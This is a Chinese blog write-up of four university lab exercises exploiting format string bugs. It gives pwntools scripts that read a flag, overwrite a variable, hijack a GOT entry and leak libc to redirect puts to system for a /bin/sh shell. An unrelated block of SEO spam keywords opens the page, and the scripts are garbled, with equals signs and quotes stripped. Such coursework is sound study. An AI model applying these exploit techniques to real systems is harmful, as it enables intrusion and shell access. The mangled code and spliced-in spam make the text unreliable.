生物科技网站建设 中企动力北京,wordpress腾讯课堂,电商行业网站建设及维护,潮安区住房和城乡建设局网站文章目录要求lab1lab2lab3lab4结语因为当时自己做实验的时候出现了很多疑问不会解决#xff0c;在网上看到了一位大佬
王森ouc 的专栏文章解决了很多问题#xff0c;也学到了很多知识和解决问题的方法#xff0c;现在把我的实验解决方法也发上来#xff0c;希望有不会的同…
文章目录要求lab1lab2lab3lab4结语因为当时自己做实验的时候出现了很多疑问不会解决在网上看到了一位大佬
王森ouc 的专栏文章解决了很多问题也学到了很多知识和解决问题的方法现在把我的实验解决方法也发上来希望有不会的同学可以通过博文理解实验内容同时能够熟练掌握这些知识。感谢这位大佬和课堂中帮助过我的同学老师。注意博文仅供学习参考使用请勿直接复制粘贴因个人复制粘贴造成的后果博主一概不负责任。
要求
通过 Objdump 或 IDA 逆向找到漏洞 • 通过 GDB 调试构造完整 payload • 通过 pwntools 触发漏洞实现实验目标
lab1
首先查看 IDA 中的反汇编代码。代码大致意思为通过 read_flag()函数从文件“flag.txt”中读取内容存入变量 flag 中。后面进行输入通过 printf()输出输入的字符。如果输入的字符存在格式化符号即可读取内存。
本例的任务是格式化字符串任意读读取的内容是 flag 文本文件的内容。首先查看文件具体信息然后获取变量 flag 的地址通过输入特定字符串确定偏移量以确定读取地址的时候的偏移量。Payload 里面是前面得到的 flag 的地址以及格式化字符用来读flag 地址的内容。
通过 nm 查看 flag 地址获得 flag 地址“0x0804a034”。 通过输入特定字符串比如 “AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p” 确定字符串的偏移量。可以看到输入字符串之后输出的“0x41414141”在偏移量为 11 的地方。在此之前关闭 Linux 的内存地址随机化。
如图是输入字符串后的堆栈图输入的 AAAA 如前所说偏移量为 11则后续的 flag 地址偏移量为 12用%12$s 即可将该处的内容按地址读取。 脚本如下
from pwn import *
p process(./lab3_1)
flag_addr 0x0804a034
p.recvuntil(bGive me something...\n)
payload p32(flag_addr)b%11$s
p.send(payload)
print(p.recv())
#p.interactive()lab2
运行程序时进行输入程序输出输入的字符串进行一系列操作后面将 changethis 与“0xBADF00D”进行比较如果相同则 read_flag()输出 flag。
因为 changethis 要和一个数“0xBADF00D”进行比较所以要修改changethis 的值为这个数然后程序进入 read_flag()输出 flag。
通过 nm 查看 changethis 地址获得 changethis 地址“0x0804a038”通过输入特定字符串比如“AAAA”确定字符串的偏移量。可以看到输入字符串“AAAA.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p”之后输出的“0x41414141”在偏移量为 11 的地方。
构造本例的 payload 可以使用函数 fmtstr_payload()payload fmtstr_payload(11, {0x0804a038: 0xBADF00D})。
构造 payload 也可以手动构造。因为要输入的字符串太多所以用 hn 输入两个字节。将字符串分成 “0xBAD” 和 “0xF00D”将其转换为 int 型“0xBAD” 和 “0xF00D” 分别为 “2989” 和 “61453” 。注意输入构 “0xF00D” 的时候因为之前构造 “0xBAD” 以及输入了 2989 个字符而输入的所有字符用来构造 “0xF00D”所以需要在“61453”的基础上减去 “2989” 得 “58464” 。
脚本如下
from pwn import *
change_this_addr0x0804a038
payload b%2989c%18$hnb%58464c%19$hnbaaa\x3a\xa0\x04\x08\x38\xa0\x04\x08
pprocess([./lab3_2,payload])
p.recvuntil(b\n\n\n-----after------)
print(p.recv())lab3
运行时输入 buf程序再输出输入的字符串。
劫持控制流call _strdup — _strdup 的 PLT 表 — _strdup 的got 表plt 表能从 GOT 表中找到真实的 strdup 函数供程序加载运行。通过输入的 buf 修改 strdup 的 GOT 表将其修改为one_gadget()函数的地址当执行 strdup 函数的时候实际执行的就是后门函数 one_gadget()。本例使用函数 fmtstr_payload()来构造 payload。
通过 nm 查看 one_gadget()函数地址如图。获得 one_gadget() 函数地址“0x0804852b”。在 IDA 里查看 PLT 表GOT 表地址,后续要用到的是 GOT 表地址“0x0804a014”。
from pwn import *
pprocess(./lab3_3)
return_addr##你的return地址##
strdup_addr##你的strdup地址##
p.recv()
payload fmtstr_payload(11, {strdup_addr:return_addr})
p.sendline(payload)
p.interactive()lab4
输入用户名ask_username 将输入的字符串复制到 v4 中对每个字符加一ask_password 将修改后的 v4 与 “sysbdmin” 进行比较不同则退出相同则继续。因此可得输入的字符串为 “rxraclhm” 。之后输出提示语。可输入的操作共有三种put类似新建文件、get类似打开文件查看其内容、dir类似查看当前所有文件名。
① 大致思路 首先解决如何得到 system 函数的地址的问题。 再解决如何执行 system 函数的问题。 最后解决 system 函数的参数即“/bin/sh”字符串如何获取的问题。
② 得到 system 函数的地址 在 IDA 中查看程序中没有 system 函数。但是 libc.so 文件中有system 函数因此可以利用程序执行时的动态链接库 libc.so 泄露 system 函数地址。由于函数是动态加载进内存的代码所在的内存地址不一定相同但是每个函数的相对地址不变只是加了一个基址。所以函数本次运行的真正地址 基址 偏移量。
③ 执行 system 函数 使用 fmtstr-payload 函数构造 payload用格式化字符串漏洞修改 show_dir()返回的 puts()函数的 got 表地址将其修改成system 函数地址因此执行 puts 函数的时候实际执行的是system 函数。
④ 构造获取权限的 “/bin/sh 字符串” puts() 返回的是文件名system 函数时所用的参数就是文件名因此可以把文件名写成/bin/sh 来完成调用一次攻击需要 put 两次文件可以在最后一次直接使用 ‘/bin/sh;’ 对文件命名。
具体操作 通过 ldd 查看使用到的动态链接库信息。查看 puts 的 GOT 表地址。
from pwn import *
def put(name,content):p.sendline(put)p.recvuntil(please enter the name of the file you want to upload:)p.sendline(name)p.recvuntil(then, enter the content:)p.sendline(content)
def get(name):p.sendline(get)p.recvuntil(enter the file name you want to get:)p.sendline(name)datap.recv()return data
def show_dir():p.sendline(dir)
def password():p.recvuntil(Name (ftp.hacker.server:Rainism):)p.sendline(rxraclhm)
p process(./lab3_4)
password()
libc ELF(##你的动态链接库##)
system_offsetlibc.symbols[system]
puts_offsetlibc.symbols[puts]
puts_got##你的puts的got表地址##
put(addr,b%8$sp32(puts_got))
puts_addru32(get(addr)[:4])
system_addr puts_addr - puts_offset system_offset
payload fmtstr_payload(7, {puts_got: system_addr})
put(/bin/sh;,payload)
p.recvuntil(ftp)
get(/bin/sh;)
show_dir()
p.interactive()结语
这个实验很难前前后后三周左右才啃下来这个硬骨头期间和同学以及助教讨论学习了很多通过这门课确实学到了不少有用的东西只要认真做实验对漏洞这方面的理解会很深的。
